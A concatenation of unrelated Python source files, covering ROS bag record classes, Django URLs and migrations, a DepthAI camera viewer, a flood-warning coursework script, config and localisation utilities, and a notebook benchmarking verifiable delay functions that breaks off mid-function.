def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float32MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float64(bag_records.records.RecordBase):
"""Record for std_msgs/Float64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float64, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float64MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Float64MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float64MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Header(bag_records.records.RecordBase):
"""Record for std_msgs/Header types
"""
def __init__(self, has_msg_time=True):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Defaults True since header has a time stamp
Returns:
class instance
"""
        super(Header, self).__init__(has_msg_time=has_msg_time, interpolate=False)
self._fields = {
'frame_id': [], 'seq': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int16(bag_records.records.RecordBase):
"""Record for std_msgs/Int16 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int16, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int16MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int16MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int16MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int32(bag_records.records.RecordBase):
"""Record for std_msgs/Int32 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int32, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int32MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int32MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int32MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int64(bag_records.records.RecordBase):
"""Record for std_msgs/Int64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int64, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int64MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int64MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int64MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int8(bag_records.records.RecordBase):
"""Record for std_msgs/Int8 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int8, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int8MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int8MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int8MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class String(bag_records.records.RecordBase):
"""Record for std_msgs/Int64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(String, self).__init__(
has_msg_time=has_msg_time, interpolate=False)
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
def close(self):
"""Close the bag
Overrides base method for this, we can't interp it so there's no reason
to make it a numpy array. We will still array up the stamps
Arguments:
no arguments
Returns:
no returns
"""
self._fields['bag_time'] = numpy.array(self._fields['bag_time'])
if self._has_msg_time:
self._fields['msg_time'] = numpy.array(self._fields['msg_time'])
class Time(bag_records.records.RecordBase):
"""Record for std_msgs/Time types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Time, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt16(bag_records.records.RecordBase):
"""Record for std_msgs/UInt16 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt16, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt16MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt16MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt16MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt32(bag_records.records.RecordBase):
"""Record for std_msgs/UInt32 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt32, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt32MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt32MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt32MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt64(bag_records.records.RecordBase):
"""Record for std_msgs/UInt64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt64, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt64MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt64MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt64MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt8(bag_records.records.RecordBase):
"""Record for std_msgs/UInt8 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt8, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt8MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt8MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt8MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
|
from django.conf.urls import patterns, url
from things.views import ThingDetailView, ThingListView
from .models import Post, PostPhoto
urlpatterns = patterns(
'',
url(r'^posts/$',
ThingListView.as_view(model=Post),
name='post_list'),
url(r'^posts/(?P<slug>[\w\-\/]+)/$',
ThingDetailView.as_view(model=Post),
name='post_detail'),
url(r'^post-photos/(?P<slug>[\w\-\/]+)/$',
ThingDetailView.as_view(model=PostPhoto),
name='post_photo_detail'),
)
|
# Generated by Django 3.1.7 on 2021-04-09 14:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('rest_api', '0007_auto_20210409_1717'),
]
operations = [
migrations.RemoveField(
model_name='extremesport',
name='country',
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Illustration of Theiler window using an AR(1) series.
An AR(1) time series is temporally correlated. Thus, if a judicious
(nonzero) value of the Theiler window is not used, the estimated
dimension converges to the fractal dimension of the trajectory formed by
the time series in the phase space. This, however, has nothing to do
with any low-dimensional nature of the underlying process.
"""
from nolitsa import d2
import numpy as np
import matplotlib.pyplot as plt
N = 5000
x = np.empty(N)
np.random.seed(882)
n = np.random.normal(size=(N), loc=0, scale=1.0)
a = 0.998
x[0] = n[0]
for i in range(1, N):
x[i] = a * x[i - 1] + n[i]
# Delay is the autocorrelation time.
tau = 400
dim = np.arange(1, 10 + 1)
plt.figure(1)
plt.title(r'Local $D_2$ vs $r$ for AR(1) time series with $W = 0$')
plt.xlabel(r'Distance $r$')
plt.ylabel(r'Local $D_2$')
for r, c in d2.c2_embed(x, tau=tau, dim=dim, window=0):
plt.semilogx(r[3:-3], d2.d2(r, c))
plt.figure(2)
plt.title(r'Local $D_2$ vs $r$ for AR(1) time series with $W = 400$')
plt.xlabel(r'Distance $r$')
plt.ylabel(r'Local $D_2$')
for r, c in d2.c2_embed(x, tau=tau, dim=dim, window=400):
plt.semilogx(r[3:-3], d2.d2(r, c))
plt.show()
|
__version__ = "2.0.1"
# __version__ has to be defined in the first line
from .classifiers import (Box_Plot, Equal_Interval, Fisher_Jenks,
Fisher_Jenks_Sampled, HeadTail_Breaks, Jenks_Caspall,
Jenks_Caspall_Forced, Jenks_Caspall_Sampled,
Max_P_Classifier, Maximum_Breaks, Natural_Breaks,
Quantiles, Percentiles, Std_Mean, User_Defined,
load_example, gadf, K_classifiers, CLASSIFIERS)
|
#!/usr/bin/env python3
import cv2
import depthai as dai
import numpy as np
# Start defining a pipeline
pipeline = dai.Pipeline()
# Define a source - two mono (grayscale) cameras
cam_left = pipeline.createMonoCamera()
cam_left.setCamId(1)
cam_left.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
cam_right = pipeline.createMonoCamera()
cam_right.setCamId(2)
cam_right.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
# Create outputs
xout_left = pipeline.createXLinkOut()
xout_left.setStreamName('left')
cam_left.out.link(xout_left.input)
xout_right = pipeline.createXLinkOut()
xout_right.setStreamName('right')
cam_right.out.link(xout_right.input)
# Pipeline defined, now the device is assigned and pipeline is started
device = dai.Device(pipeline)
device.startPipeline()
# Output queues will be used to get the grayscale frames from the outputs defined above
q_left = device.getOutputQueue(name="left", maxSize=4, overwrite=True)
q_right = device.getOutputQueue(name="right", maxSize=4, overwrite=True)
frame_left = None
frame_right = None
while True:
# instead of get (blocking) used tryGet (nonblocking) which will return the available data or None otherwise
in_left = q_left.tryGet()
in_right = q_right.tryGet()
if in_left is not None:
# if the data from the left camera is available, transform the 1D data into a frame
frame_left = in_left.getData().reshape((in_left.getHeight(), in_left.getWidth())).astype(np.uint8)
frame_left = np.ascontiguousarray(frame_left)
if in_right is not None:
# if the data from the right camera is available, transform the 1D data into a frame
frame_right = in_right.getData().reshape((in_right.getHeight(), in_right.getWidth())).astype(np.uint8)
frame_right = np.ascontiguousarray(frame_right)
# show the frames if available
if frame_left is not None:
cv2.imshow("left", frame_left)
if frame_right is not None:
cv2.imshow("right", frame_right)
if cv2.waitKey(1) == ord('q'):
break
|
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.station import MonitoringStation
from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.analysis import polyfit
import numpy as np
import datetime
# Defining parameters for risk levels globally
# (thresholds on relative water level: moderate < high < severe)
moderate = 1
high = 1.5
severe = 2
def run():
# Building station list and updating water levels
stations = build_station_list()
update_water_levels(stations)
    # This program will mainly use the current water level compared to its typical high level as an
    # indication of whether it will flood
risk_levels = []
for i in range(len(stations)):
risk_level = stations[i].relative_water_level()
risk_levels.append(risk_level)
# Creating lists to fill with stations
severe_risk_towns = []
high_risk_towns = []
moderate_risk_towns = []
low_risk_towns = []
# Adding to lists dependent on risk level
for i in range(len(risk_levels)):
        if risk_levels[i] is not None:
if risk_levels[i] > severe:
severe_risk_towns.append(stations[i])
elif high < risk_levels[i] < severe:
high_risk_towns.append(stations[i])
elif moderate < risk_levels[i] < high:
moderate_risk_towns.append(stations[i])
else:
low_risk_towns.append(stations[i])
# Defining a list to fill with towns where risk level is increasing
water_level_increasing = []
water_level_decreasing = []
corrupt_stations = []
for i in range(len(high_risk_towns)):
        # Fetching data for the polyfit function to approximate the level trend
        try:
            dates, levels = fetch_measure_levels(high_risk_towns[i].measure_id, dt=datetime.timedelta(days=2))
        except Exception:
            corrupt_stations.append(high_risk_towns[i].name)
            continue
        flag = True
if len(dates) == 0:
flag = False
for j in range(len(levels)):
if type(levels[j]) != float:
flag = False
if flag == True:
poly_tuple = polyfit(dates, levels, 4)
poly = poly_tuple[0]
# Taking derivative
derivative = np.polyder(poly, m=1)
# Evaluating at the time now (list begins at most recent data)
derivative_now = derivative(0)
# If derivative greater than 0 then water level increasing!
if derivative_now > 0:
water_level_increasing.append(high_risk_towns[i])
if derivative_now < 0:
water_level_decreasing.append(high_risk_towns[i])
else:
corrupt_stations.append(high_risk_towns[i].name)
print(corrupt_stations)
# Setting condition to prevent an infinite loop
choice = True
while choice == True:
# Asking for user input to decide what list will be displayed
print('\nPlease enter a valid risk level: severe, high, moderate or low, or press enter to quit program')
option = str(input("What risk level would you like to see? "))
if option == "severe":
# Constructing statement of towns at severe risk
severe_statement = "----The towns at severe risk are: "
# Constructing statement for decrease in water levels
severe_changing_statement = "Phew- looks like the worst is behind these towns: "
            # Iterating through severe risk towns to add them to the list
for i in range(len(severe_risk_towns)):
severe_statement += "{}, ".format(severe_risk_towns[i].name)
# Adding to list of towns that may soon be safe
if severe_risk_towns[i] in water_level_decreasing:
                    severe_changing_statement += "{}, ".format(severe_risk_towns[i].name)
            # Printing lists
            print(severe_statement)
            print(severe_changing_statement)
# Repeating for other options
elif option == "high":
high_statement = "\n----The towns at high risk are: "
high_changing_statement = "\n!!! THESE AREAS MAY SOON BE AT SEVERE RISK: "
for i in range(len(high_risk_towns)):
high_statement += "{}, ".format(high_risk_towns[i].name)
if high_risk_towns[i] in water_level_increasing:
high_changing_statement += "{}, ".format(high_risk_towns[i].name)
print(high_statement)
print(high_changing_statement + "!!!")
elif option == "moderate":
moderate_statement = "\n----The towns at moderate risk are: "
for i in range(len(moderate_risk_towns)):
moderate_statement += "{}, ".format(moderate_risk_towns[i].name)
print(moderate_statement)
elif option == "low":
            low_statement = "\n----The towns at low risk are: "
            low_changing_statement = "\n!!! THESE AREAS MAY SOON BE AT HIGHER RISK: "
for i in range(len(low_risk_towns)):
low_statement += "{}, ".format(low_risk_towns[i].name)
if low_risk_towns[i] in water_level_increasing:
low_changing_statement += "{}, ".format(low_risk_towns[i].name)
print(low_statement)
print(low_changing_statement)
# Allowing exit from loop
elif option == '':
choice = False
# Allowing for possibility that user enters invalid responce
else:
print("This is not a valid response")
if __name__ == "__main__":
print("\n*** Task 2G: CUED Part IA Flood Warning System ***")
run()
|
from validator.decorator import version_range
from validator.constants import (FIREFOX_GUID, FENNEC_GUID,
THUNDERBIRD_GUID as TB_GUID, ANDROID_GUID)
# Compatibility app/version ranges:
def _build_definition(maj_version_num, firefox=True, fennec=True,
thunderbird=True, android=True):
definition = {}
app_version_range = (
lambda app: version_range(app, '%d.0a1' % maj_version_num,
'%d.0a1' % (maj_version_num + 1)))
if firefox:
definition[FIREFOX_GUID] = app_version_range('firefox')
if fennec:
definition[FENNEC_GUID] = app_version_range('fennec')
if thunderbird:
definition[TB_GUID] = app_version_range('thunderbird')
if android:
definition[ANDROID_GUID] = app_version_range('android')
return definition
FX45_DEFINITION = _build_definition(45)
FX46_DEFINITION = _build_definition(46)
FX47_DEFINITION = _build_definition(47)
FX48_DEFINITION = _build_definition(48)
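# Each FX*_DEFINITION maps application GUIDs to the '<N>.0a1'..'<N+1>.0a1' version range
# for that release, e.g. FX45_DEFINITION covers the 45.0a1-46.0a1 range for every
# enabled application (Firefox, Fennec, Thunderbird, Android).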
|
"""
Implementation of the config class, which manages the config of different bittensor modules.
"""
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import yaml
from munch import Munch
import bittensor
class Config ( Munch ):
"""
Implementation of the config class, which manages the config of different bittensor modules.
"""
def __init__(self, loaded_config = None ):
super().__init__()
if loaded_config:
raise NotImplementedError('Function load_from_relative_path is not fully implemented.')
def __repr__(self) -> str:
return self.__str__()
def __str__(self) -> str:
return "\n" + yaml.dump(self.toDict())
def to_string(self, items) -> str:
""" Get string from items
"""
return "\n" + yaml.dump(items.toDict())
def update_with_kwargs( self, kwargs ):
""" Add config to self
"""
for key,val in kwargs.items():
self[key] = val
def to_defaults(self):
try:
if 'axon' in self.keys():
bittensor.defaults.axon.port = self.axon.port
bittensor.defaults.axon.ip = self.axon.ip
bittensor.defaults.axon.max_workers = self.axon.max_workers
bittensor.defaults.axon.maximum_concurrent_rpcs = self.axon.maximum_concurrent_rpcs
if 'dataset' in self.keys():
bittensor.defaults.dataset.batch_size = self.dataset.batch_size
bittensor.defaults.dataset.block_size = self.dataset.block_size
bittensor.defaults.dataset.max_corpus_size = self.dataset.max_corpus_size
bittensor.defaults.dataset.num_workers = self.dataset.num_workers
bittensor.defaults.dataset.dataset_name = self.dataset.dataset_name
bittensor.defaults.dataset.data_dir = self.dataset.data_dir
bittensor.defaults.dataset.save_dataset = self.dataset.save_dataset
            if 'dendrite' in self.keys():
                # Copy the loaded dendrite settings onto the corresponding defaults
                for key, val in self.dendrite.items():
                    bittensor.defaults.dendrite[key] = val
if 'logging' in self.keys():
bittensor.defaults.logging.debug = self.logging.debug
bittensor.defaults.logging.trace = self.logging.trace
bittensor.defaults.logging.record_log = self.logging.record_log
bittensor.defaults.logging.logging_dir = self.logging.logging_dir
if 'subtensor' in self.keys():
bittensor.defaults.subtensor.network = self.subtensor.network
bittensor.defaults.subtensor.chain_endpoint = self.subtensor.chain_endpoint
if 'threadpool' in self.keys():
bittensor.defaults.threadpool.max_workers = self.threadpool.max_workers
bittensor.defaults.threadpool.maxsize = self.threadpool.maxsize
if 'wallet' in self.keys():
bittensor.defaults.wallet.name = self.wallet.name
bittensor.defaults.wallet.hotkey = self.wallet.hotkey
bittensor.defaults.wallet.path = self.wallet.path
if 'wandb' in self.keys():
bittensor.defaults.wandb.name = self.wandb.name
bittensor.defaults.wandb.project = self.wandb.project
bittensor.defaults.wandb.tags = self.wandb.tags
bittensor.defaults.wandb.run_group = self.wandb.run_group
bittensor.defaults.wandb.directory = self.wandb.directory
bittensor.defaults.wandb.offline = self.wandb.offline
except Exception as e:
print('Error when loading config into defaults {}'.format(e))
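# A minimal usage sketch (illustrative values only, not real bittensor defaults): build a
# Config by hand, merge keyword arguments into it, and print it as YAML.
if __name__ == '__main__':
    example = Config()
    example.update_with_kwargs({'wallet': Munch(name='my_wallet', hotkey='my_hotkey', path='~/.bittensor/wallets/')})
    print(example)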
|
from pathlib import Path
from dataclasses import dataclass, field
from loguru import logger
from libraries.crowdin import UECrowdinClient
from libraries.utilities import LocTask
@dataclass
class AddSourceFiles(LocTask):
# Declare Crowdin parameters to load them from config
token: str = None
organization: str = None
project_id: int = None
# TODO: Process all loc targets if none are specified
# TODO: Change lambda to empty list to process all loc targets when implemented
loc_targets: list = field(
default_factory=lambda: ['Game']
) # Localization targets, empty = process all targets
file_format: str = 'auto' # gettext_unreal to use the Unreal PO parser on Crowdin
src_locale: str = 'io'
export_pattern: str = '{target}/%locale%/{target}.po'
# TODO: Do I need this here? Or rather in smth from uetools lib?
content_dir: str = '../'
_fname: str = 'Localization/{target}/{locale}/{target}.po'
_content_path: Path = None
def post_update(self):
super().post_update()
self._content_path = Path(self.content_dir).resolve()
self._fname = self._fname.format(locale=self.src_locale, target='{target}')
def add_source_files(self):
crowdin = UECrowdinClient(
self.token, logger, self.organization, self.project_id
)
logger.info(f'Content path: {self._content_path}')
targets_processed = []
for target in self.loc_targets:
fpath = self._content_path / self._fname.format(target=target)
logger.info(f'Uploading file: {fpath}. Format: {self.file_format}')
r = crowdin.add_file(
fpath,
type=self.file_format,
export_pattern=self.export_pattern.format(target=target),
)
if r == True:
targets_processed += [target]
logger.info(f'File for {target} added.')
else:
logger.error(
f'Something went wrong. Here\'s the last response from Crowdin: {r}'
)
if len(targets_processed) == len(self.loc_targets):
print('Targets processed', len(targets_processed), targets_processed)
return True
return False
def main():
logger.add(
'logs/locsync.log',
rotation='10MB',
retention='1 month',
enqueue=True,
format='{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}',
level='INFO',
)
logger.info('')
logger.info('--- Add source files on Crowdin script start ---')
logger.info('')
task = AddSourceFiles()
task.read_config(Path(__file__).name, logger)
result = task.add_source_files()
logger.info('')
logger.info('--- Add source files on Crowdin script end ---')
logger.info('')
if result:
return 0
return 1
# Run the main functionality of the script if it's not imported
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import hashlib
import time
import math
import matplotlib.pyplot as plt
from random import SystemRandom, randint
"""
generate a number of length
"""
def generate_number(k):
random = SystemRandom()
p = random.getrandbits(k)
binary = bin(p)
new_binary = binary[0:len(binary) - 1] + "1"
return int(new_binary, 2)
def generate_prime_number_below_bits(x):
prime = int(''.join(map(str,[randint(0,1) for _ in range(x)])),2)
while not check_prime(prime):
prime = int(''.join(map(str,[randint(0,1) for _ in range(x)])),2)
return prime
"""
Performs Miller Rabin Test
Input : n = number, r
"""
def miller_rabin_test(r, n):
a = 2 + randint(2, n - 2)
p = pow(a, r, n)
if p == 1 or p == n - 1:
return True
while r != (n - 1):
p = pow(p, 2, n)
r *= 2
if p == 1:
return False
if p == (n - 1):
return True
return False
"""
performs prime check
Input : n = number which has to be checked
Output : true or false
"""
def check_prime(n):
if n == 2 or n == 3:
return True
elif n <= 1 or n % 2 == 0:
return False
r = n - 1
while r % 2 == 0:
r //= 2
for i in range(128):
if not miller_rabin_test(r, n):
return False
return True
"""
generate a prime number
"""
def give_prime(k):
prime = generate_number(k)
while not check_prime(prime):
prime = generate_number(k)
return prime
def give_parameters(k):
    return (SystemRandom().randint(0, 100), SystemRandom().randint(1, 100), give_prime(k))
# # Fast Modular Power Calculation
# In[2]:
def power(x, a, N) :
res = 1 # Initialize result
# Update x if it is more
# than or equal to p
x = x % N
if (x == 0) :
return 0
while (a > 0) :
# If y is odd, multiply
# x with result
if ((a & 1) == 1) :
res = (res * x) % N
# y must be even now
a = a >> 1 # y = y/2
x = (x * x) % N
return res
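# Optional sanity check (illustrative, not called by the benchmark below): the
# square-and-multiply routine above should agree with Python's built-in pow().
def _check_power_against_builtin(trials=10):
    for _ in range(trials):
        N = randint(3, 1000)
        x = randint(2, N - 1)
        a = randint(1, 64)
        assert power(x, a, N) == pow(x, a, N)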
# # VDF Setup -- the basic parameter (N, x) will be the same all VDF scheme
#
# ### N -- Module
# ### x -- sample instance
# In[3]:
def Setup(Lambda, j):
# start_1 = time.time()
# start_2 = time.time()
# start_3 = time.time()
p = give_prime(Lambda);
q = give_prime(Lambda);
x = generate_number(Lambda)
start_1 = time.time()
start_2 = time.time()
start_3 = time.time()
N = p * q
phiN = (p-1)*(q-1)
T = 2**j
end_3 = time.time()
t = (2**T) % phiN
ybar = power(x, t, N)
Gamma = hashlib.sha512(str(ybar).encode())
end_2 = time.time()
Tcap = SystemRandom().randint(1,T)
xcap = power(x, Tcap, N)
end_1 = time.time()
st_1 = round((end_1-start_1) * 1000, 5) # For Proposed VDF - 1
st_2 = round((end_2-start_2) * 1000, 5) # For Proposed VDF - 2
st_3 = round((end_3-start_3) * 1000, 5) # For Wesoloski and Pietrzak VDF
return (N, x, xcap, T, Tcap, Gamma, st_1, st_2, st_3)
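# Note: because phi(N) is known to the setup, x^(2^T) mod N is obtained via the shortcut
# exponent t = 2^T mod phi(N) (Euler's theorem, assuming gcd(x, N) = 1); this is how ybar and
# the commitment Gamma are precomputed without running the long sequential squaring chain.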
# ## Wesoloski's VDF (Efficient VDF)
# In[4]:
def Wes_Eval(Lambda, N, x, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 2)
# print("\nEvaluation Time:", {et})
start = time.time()
l = give_prime(2*Lambda)
q = (2**T)//l
pi = power(x, q, N)
end = time.time()
pt = round((end-start) * 1000, 5)
# print("Proof Generation Time:", {pt})
return y, pi, l, et, pt
# In[5]:
def Wes_Verify(Lambda, N, x, T, y, pi, l):
start = time.time()
r = 2**T % l
ycap = (power(pi, l, N) * power(x, r, N)) % N
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(y == ycap):
return 1, vt
return 0, vt
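# Verification rests on the identity pi^l * x^(2^T mod l) = x^(l*floor(2^T/l) + (2^T mod l)) = x^(2^T) = y (mod N),
# so recomputing ycap costs only two short modular exponentiations instead of T sequential squarings.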
# In[6]:
def Wes_Main(Lambda, N, x, T):
y, pi, l, et, pt = Wes_Eval(Lambda, N, x, T)
out, vt = Wes_Verify(Lambda, N, x, T, y, pi, l)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, pt, vt
# ## Pietrzak's VDF (Simple VDF)
# In[7]:
def Pie_Eval(Lambda, N, x, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 2)
# print("\nEvaluation Time:", {et})
start = time.time()
xprime = x
yprime = y
pi = []
r = []
for i in range(1, round(math.log2(T))+1):
pi.append(pow(xprime, (2**int(T/(2**i))), N))
r.append(give_prime(Lambda//2))
xprime = (pow(xprime, r[i-1], N) * pi[i-1]) % N
yprime = (pow(pi[i-1], r[i-1], N) * yprime) % N
end = time.time()
pt = round((end-start) * 1000, 5)
# print("Proof Generation Time:", {pt})
return y, pi, r, et, pt
# In[8]:
def Pie_Verify(Lambda, N, x, T, y, pi, r):
start = time.time()
xprime = x
yprime = y
for i in range(1, round(math.log2(T))+1):
xprime = (pow(xprime, r[i-1], N) * pi[i-1]) % N
yprime = (pow(pi[i-1], r[i-1], N) * yprime) % N
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(yprime == ((xprime*xprime) % N)):
return 1, vt
return 0, vt
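# Each round halves the claim: with pi_i = x'^(2^(T/2^i)) and a random challenge r_i, the pair
# (x', y') is folded into (x'^r_i * pi_i, pi_i^r_i * y'), which preserves y' = x'^(2^(T/2^i)) for
# an honest prover; after log2(T) rounds the verifier only has to check y' == x'^2 (mod N).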
# In[9]:
def Pie_Main(Lambda, N, x, T):
y, pi, r, et, pt = Pie_Eval(Lambda, N, x, T)
out, vt = Pie_Verify(Lambda, N, x, T, y, pi, r)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, pt, vt
# ## The proposed VDF Scheme -- 1
# In[10]:
def DH_Eval_1(Lambda, N, x, xcap, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 5)
# print("\nEvaluation Time:", {et})
pi = power(xcap, 2**T, N)
return y, pi, et
# In[11]:
def DH_Verify_1(Lambda, N, x, xcap, T, Tcap, y, pi):
start = time.time()
ycap = power(y, Tcap, N)
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
